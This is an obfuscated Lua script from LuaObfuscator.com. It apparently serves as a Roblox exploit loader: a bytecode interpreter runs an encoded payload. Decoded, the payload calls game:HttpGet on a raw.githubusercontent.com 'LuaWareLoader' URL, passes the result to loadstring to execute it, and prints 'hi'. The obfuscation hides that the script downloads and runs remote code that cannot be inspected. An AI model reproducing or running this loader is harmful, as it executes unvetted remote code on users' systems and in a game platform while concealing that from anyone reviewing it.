--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v76=0;while true do if (v76==0) then v19=v0(v3(v30,1,1));return "";end end else local v77=0;local v78;while true do if (v77==0) then v78=v2(v0(v30,16));if v19 then local v101=v5(v78,v19);v19=nil;return v101;else return v78;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v79=0 -0 ;local v80;while true do if (v79==0) then v80=(v31/(2^(v32-1)))%((2 -(1030 -(546 + 484)))^(((v33-(1 + 0)) -(v32-(1 + 0))) + (2 -(2 -1)))) ;return v80-(v80%(1058 -(137 + 920))) ;end end else local v81=2^(v32-(1267 -(737 + 529))) ;return (((v31%(v81 + v81))>=v81) and (1 -0)) or (686 -(132 + 554)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -(706 -(427 + 279)) ;local v36;local v37;while true do if (v35==((1 + 0) -0)) then return (v37 * (924 -(2448 -1780))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (4 -(1 + 1)) );v18=v18 + 1 + 1 ;v35=1;end end end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * ((14772424 -(287 + 87)) + 2005166)) + (v41 * ((118483 -(804 + 270)) -(27629 + 24244))) + (v40 * ((4453 -2864) -(1219 + 114))) + v39 ;end if (v38==(1638 -(1478 + 160))) then v39,v40,v41,v42=v1(v16,v18,v18 + (1039 -(37 + 999)) );v18=v18 + 2 + 2 ;v38=1 + 0 ;end end end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((533 -((578 -(226 + 255)) + 434))==v43) then v48=v20(v45,21,1597 -(1317 + 249) );v49=((v20(v45,28 + 4 )==1) and  -(1 + 0)) or (2 -1) ;v43=2 + 1 ;end if ((0 + 0)==v43) then v44=v23();v45=v23();v43=1;end if (v43==(1792 -(1395 + 396))) then v46=851 -(604 + 246) ;v47=(v20(v45,1073 -(839 + 233) ,9 + 11 ) * ((2 + 0)^(115 -(6 + 77)))) + v44 ;v43=2;end if (v43==(6 -3)) then if (v48==(234 -(100 + 134))) then if (v47==(0 + 0 + 0)) then return v49 * (0 + 0) ;else local v102=(0 -0) + 0 ;while true do if (v102==(219 -(132 + 87))) then v48=1 + 0 ;v46=(160 + 69) -(126 + 103) ;break;end end end elseif (v48==(939 + 1108)) then return ((v47==((0 -0) + 0)) and (v49 * ((1 -(0 -0))/(0 -(1958 -(257 + 1701)))))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((1251 -(275 + 429 + 545))^52))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(278 -(202 + 76))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1, #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==0) then v54=0 + 0 ;v55=nil;v53=1 -0 ;end if (v53==(2 + 2)) then while true do if (v54~=(16 -(4 + 9))) then else v61=nil;while true do local v103=0;while true do if (v103==(2 -1)) then if (v55~=(1155 -(622 + 533))) then else local v109=0;while true do if (v109~=1) then else v58={};v55=167 -(92 + 74) ;break;end if (v109==0) then local v113=265 -(247 + 18) ;local v114;while true do if (v113==(0 -0)) then v114=0;while true do if (v114==0) then v56={};v57={};v114=1;end if (v114==1) then v109=2 -1 ;break;end end break;end end end end end if (v55==3) then local v110=0;local v111;while true do if ((0 + 0)~=v110) then else v111=0;while true do local v120=0;while true do if (v120==0) then if (v111~=0) then else local v142=0 + 0 ;while true do if (v142~=1) then else v111=1;break;end if ((0 + 0)==v142) then for v159=1,v23() do v57[v159-(1447 -(856 + 590)) ]=v28();end for v161=3 -2 ,v23() do v58[v161]=v23();end v142=1;end end end if (v111~=1) then else return v59;end break;end end end break;end end end break;end if (v103==0) then local v108=0 -0 ;while true do if (v108==0) then if (v55~=2) then else local v115=0;local v116;while true do if (v115==(1657 -(352 + 1305))) then v116=0;while true do if (v116~=(1 + 0)) then else for v149=345 -(328 + 16) ,v23() do local v150=0;local v151;local v152;while true do if (v150==(70 -(12 + 58))) then v151=1795 -(1153 + 642) ;v152=nil;v150=1 + 0 ;end if (v150==(2 -1)) then while true do if (v151==(0 -0)) then v152=v21();if (v20(v152,1 + 0 ,2 -1 )~=(0 -0)) then else local v175=1085 -(224 + 861) ;local v176;local v177;local v178;local v179;local v180;local v181;while true do if (v175~=3) then else while true do if (v176==(1 + 1)) then v181=nil;while true do if (v177==(5 -3)) then while true do if (v178==(1656 -(1062 + 593))) then local v185=0;local v186;while true do if (v185==(0 -0)) then v186=1410 -(72 + 1338) ;while true do if (v186==(0 -0)) then local v194=0 -0 ;while true do if (v194==0) then v181={v22(),v22(),nil,nil};if (v179==(0 -0)) then local v198=0 -0 ;local v199;while true do if (v198==0) then v199=0 + 0 ;while true do if (v199~=0) then else v181[3]=v22();v181[3 + 1 ]=v22();break;end end break;end end elseif (v179==1) then v181[33 -(19 + 11) ]=v23();elseif (v179==(2 -0)) then v181[12 -9 ]=v23() -((7 -5)^16) ;elseif (v179~=(122 -(51 + 68))) then else local v208=0;while true do if (v208==0) then v181[3 + 0 ]=v23() -(2^16) ;v181[4]=v22();break;end end end v194=1;end if (v194==1) then v186=1 + 0 ;break;end end end if ((1309 -(1127 + 181))~=v186) then else v178=2;break;end end break;end end end if (v178~=2) then else local v187=0;local v188;while true do if (v187==0) then v188=677 -(448 + 229) ;while true do if (v188~=0) then else local v195=0;while true do if (v195~=(1545 -(1071 + 473))) then else v188=1;break;end if (v195==(1519 -(290 + 1229))) then if (v20(v180,1878 -(1652 + 225) ,1)~=(1 -0)) then else v181[1 + 1 ]=v61[v181[2]];end if (v20(v180,2,5 -3 )==(1 + 0)) then v181[6 -3 ]=v61[v181[3 + 0 ]];end v195=1;end end end if (v188==1) then v178=3;break;end end break;end end end if (v178~=(0 -0)) then else local v189=0 -0 ;local v190;while true do if (v189~=0) then else v190=0;while true do if (1~=v190) then else v178=1;break;end if (v190==0) then local v196=0 -0 ;while true do if (v196~=(756 -(244 + 512))) then else local v197=0;while true do if (v197==(1 + 0)) then v196=1 + 0 ;break;end if (v197==0) then v179=v20(v152,2,1186 -(412 + 771) );v180=v20(v152,4,6 + 0 );v197=1976 -(1036 + 939) ;end end end if (v196==(3 -2)) then v190=1 -0 ;break;end end end end break;end end end if ((1 + 2)~=v178) then else if (v20(v180,1727 -(79 + 1645) ,3)==1) then v181[1 + 3 ]=v61[v181[1363 -(27 + 1332) ]];end v56[v149]=v181;break;end end break;end if (v177~=(0 + 0)) then else v178=1072 -(1044 + 28) ;v179=nil;v177=1 + 0 ;end if (v177==(1 -0)) then v180=nil;v181=nil;v177=2;end end break;end if (0==v176) then local v184=0 -0 ;while true do if (v184~=1) then else v176=1 + 0 ;break;end if (v184~=0) then else v177=0 + 0 ;v178=nil;v184=1;end end end if (1~=v176) then else v179=nil;v180=nil;v176=872 -(174 + 696) ;end end break;end if (v175==(4 -2)) then v180=nil;v181=nil;v175=13 -10 ;end if (v175==(0 -0)) then v176=0 -0 ;v177=nil;v175=1;end if (1==v175) then v178=nil;v179=nil;v175=1 + 1 ;end end end break;end end break;end end end v55=3;break;end if (v116~=(0 -0)) then else for v153=1774 -(368 + 1405) ,v60 do local v154=0;local v155;local v156;while true do if ((1749 -(81 + 1668))==v154) then local v163=0;while true do if (v163~=(0 + 0)) then else local v174=0;while true do if (v174==(0 + 0)) then v155=v21();v156=nil;v174=1;end if (v174==(1 + 0)) then v163=1;break;end end end if (v163==1) then v154=1 + 0 ;break;end end end if (v154~=1) then else if (v155==(1 + 0)) then v156=v21()~=(0 + 0) ;elseif (v155==(4 -2)) then v156=v24();elseif (v155==3) then v156=v25();end v61[v153]=v156;break;end end end v59[3]=v21();v116=711 -(628 + 82) ;end end break;end end end if (v55~=(1 -0)) then else local v117=0 + 0 ;while true do if (v117==0) then local v121=0 + 0 ;while true do if ((0 -0)==v121) then v59={v56,v57,nil,v58};v60=v23();v121=1992 -(1885 + 106) ;end if (v121==(2 -1)) then v117=2 -1 ;break;end end end if (v117==(1 -0)) then v61={};v55=1592 -(443 + 1147) ;break;end end end v108=1;end if (v108~=(1 -0)) then else v103=1;break;end end end end end break;end if (v54==1) then local v92=0;local v93;while true do if (v92==(0 -0)) then v93=0 + 0 ;while true do if (1~=v93) then else v54=2;break;end if (v93==(1527 -(922 + 605))) then v57=nil;v58=nil;v93=1 -0 ;end end break;end end end if (v54==(1645 -(68 + 1577))) then local v94=0 + 0 ;while true do if (v94~=(0 + 0)) then else v55=0 -0 ;v56=nil;v94=19 -(14 + 4) ;end if (v94~=1) then else v54=1;break;end end end if (v54==(4 -2)) then local v95=0 -0 ;while true do if (1~=v95) then else v54=4 -1 ;break;end if (0==v95) then v59=nil;v60=nil;v95=1;end end end end break;end if ((6 -4)==v53) then v58=nil;v59=nil;v53=1342 -(658 + 681) ;end if ((10 -7)==v53) then v60=nil;v61=nil;v53=4;end if (v53==1) then v56=nil;v57=nil;v53=2;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=0;local v71;local v72;local v73;local v74;local v75;while true do if (v70==3) then A,B=v27(v11(v75));if  not A[1] then local v96=0;local v97;while true do if (v96==0) then v97=v62[4][v71] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v70==0) then v71=1;v72= -1;v70=1;end if (v70==2) then v75=nil;function v75()local v82=v65;local v83=v66;local v84=v67;local v85=v27;local v86={};local v87={};local v88={};for v98=0,v74 do if (((5808 -2820)<=(242 + 2818)) and (v98>=v84)) then v86[v98-v84 ]=v73[v98 + 1 ];else v88[v98]=v73[v98 + (199 -(110 + 88)) ];end end local v89=(v74-v84) + 1 ;local v90;local v91;while true do local v99=822 -(675 + 147) ;local v100;while true do if (((4724 -1844)>=(2339 + 263)) and (v99==(0 + 0))) then v100=0;while true do if ((v100==(1750 -(830 + 919))) or ((2041 + 772)<(907 + 533))) then if ((v91<=5) or ((4034 -1494)>=(4516 -(569 + 1297)))) then if (((3625 + (2916 -1798))>=(4254 -(132 + (554 -261)))) and (v91<=(1 + 1))) then if (((3252 -(24 + 40 + 753))<3277) and (v91<=(0 + 0))) then local v122=0 + 0 ;local v123;while true do if (((1243 + 3740)>=(667 + 2601)) and (v122==(0 + 0 + 0))) then v123=v90[8 -6 ];v88[v123]=v88[v123](v13(v88,v123 + 1 ,v72));break;end end elseif (((1211 + 869)==(2567 -(244 + 243))) and (v91>(2 -1))) then for v146=v90[1071 -(926 + 143) ],v90[3 + 0 ] do v88[v146]=nil;end else v88[v90[2 -0 ]]=v64[v90[2 + 0 + 1 ]];end elseif (((117 + 398 + 3343)>(3496 -2299)) and (v91<=3)) then v88[v90[1 + 1 ]]=v90[3];elseif ((v91==(5 -1)) or ((2876 -(1027 + 523))>=(253 + 1408))) then do return;end else v88[v90[2 + 0 + 0 ]]();end elseif (((5205 -(490 + (538 -199)))==(13540 -9164)) and (v91<=(1 + (1880 -(624 + 1249))))) then if (((4979 -(969 + 410))==(3047 + 553)) and (v91<=((1892 -(102 + 168)) -(1132 + 484)))) then local v126=0 -0 ;local v127;while true do if (((890 -(820 + 70))==v126) or ((1116 -891)>(2512 + 1116))) then v127=v90[382 -(118 + 262) ];v88[v127](v88[v127 + (1516 -(1327 + 188)) ]);break;end end elseif (((456 + 1607)==(6186 -4123)) and (v91==(4 + 3))) then v88[v90[2]]=v90[2 + 1 ]~=(0 + 0) ;else v71=v90[1 + 2 ];end elseif ((3211>(3994 -(2008 -707))) and (v91<=(18 -9))) then local v128=0;local v129;local v130;local v131;local v132;local v133;while true do if (((3164 -(573 + 1024))<(9756 -5214)) and ((0 + 0)==v128)) then v129=0 -0 ;v130=nil;v128=1;end if ((v128==(4 -2)) or (3156==(79 -(13 + 6)))) then v133=nil;while true do if (((201 + 1803)>=(848 -192)) and (v129==1)) then v72=(v132 + v130) -(1 + 0) ;v133=835 -(200 + 29 + 152 + 454) ;v129=2;end if ((v129==0) or (3348<(1376 + 347))) then local v158=0;while true do if (((901 -(423 + 478))==v158) or (4463<=3361)) then v130=v90[1978 -(1242 + 734) ];v131,v132=v85(v88[v130](v13(v88,v130 + (1 -0) ,v90[2 + 1 ])));v158=1526 -(1208 + 317) ;end if ((2090<=3868) and (v158==(3 -2))) then v129=1 + 0 ;break;end end end if ((v129==(3 -1)) or (1386>(5850 -(396 + 887)))) then for v165=v130,v72 do local v166=1556 -(441 + 1115) ;local v167;while true do if ((v166==(0 + 0)) or ((3275 -(772 + 228))==((1776 + 2540) -(186 + 1177)))) then v167=0 -0 ;while true do if ((4573==(13298 -8725)) and (v167==(0 + 0))) then v133=v133 + (1058 -(890 + 167)) ;v88[v165]=v131[v133];break;end end break;end end end break;end end break;end if (((1 + 0)==v128) or ((3234 -(1260 + 116))>(1804 + 984))) then v131=nil;v132=nil;v128=1374 -(1044 + 328) ;end end elseif (((3513 + 243 + 1239)>=(157 + (2902 -(350 + 1470)))) and (v91==(27 -17))) then local v138=0 -(0 -0) ;local v139;local v140;local v141;while true do if ((v138==((3748 -(1166 + 590)) -(146 + 1846))) or ((2590 -(184 + 456))>(1284 + 2334))) then v139=0 -0 ;v140=nil;v138=1 + 0 ;end if ((v138==(637 -(489 + 147))) or ((5116 -2273)==(1563 -935))) then v141=nil;while true do if ((v139==(1 + 0)) or (4869<=(4538 -(1636 + 100)))) then v88[v140 + (1633 -(925 + 707)) ]=v141;v88[v140]=v141[v90[10 -(6 + 0) ]];break;end if (((397 -(59 + (969 -631)))==v139) or ((2455 -(72 + 436))>=(5355 -(291 + 1557)))) then v140=v90[(3508 -(443 + 1088)) -(839 + 1136) ];v141=v88[v90[3]];v139=1013 -(989 + 23) ;end end break;end end elseif ((v88[v90[6 -4 ]]==v90[1 + 3 ]) or ((11884 -7854)>(6868 -2489))) then v71=v71 + (4 -3) ;else v71=v90[7 -4 ];end v71=v71 + (1641 -(118 + 1522)) ;break;end if (((9646 -5858)>((1832 + 1851) -(541 + (276 -(188 + 84))))) and (v100==0)) then local v112=0 + 0 ;while true do if ((v112==(0 + (1790 -(887 + 903)))) or ((3295 -((1672 -(244 + 1168)) + 205))<=(1165 -357))) then v90=v82[v71];v91=v90[1];v112=1132 -(629 + 502) ;end if ((v112==(1776 -(988 + 787))) or ((133 + 977)>(774 + 773))) then v100=1 + 0 ;break;end end end end break;end end end end v70=3;end if (v70==1) then v73={...};v74=v12("#",...) -1 ;v70=2;end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403503O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6672656E63616C696265722F4C7561576172654C6F616465722E6C772F6D61696E2F6C74326E6577736F7572636503053O007072696E7403023O00686900173O0012033O00014O0002000100013O00260B3O0002000100010004083O00020001001203000100013O00260B00010005000100010004083O00050001001201000200023O001201000300033O00200A000300030004001203000500054O0007000600014O0009000300066O00023O00022O0005000200010001001201000200063O001203000300074O00060002000200010004083O001600010004083O000500010004083O001600010004083O000200012O00043O00017O00173O00023O00033O00053O00053O00063O00083O00083O00093O00093O00093O00093O00093O00093O00093O00093O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
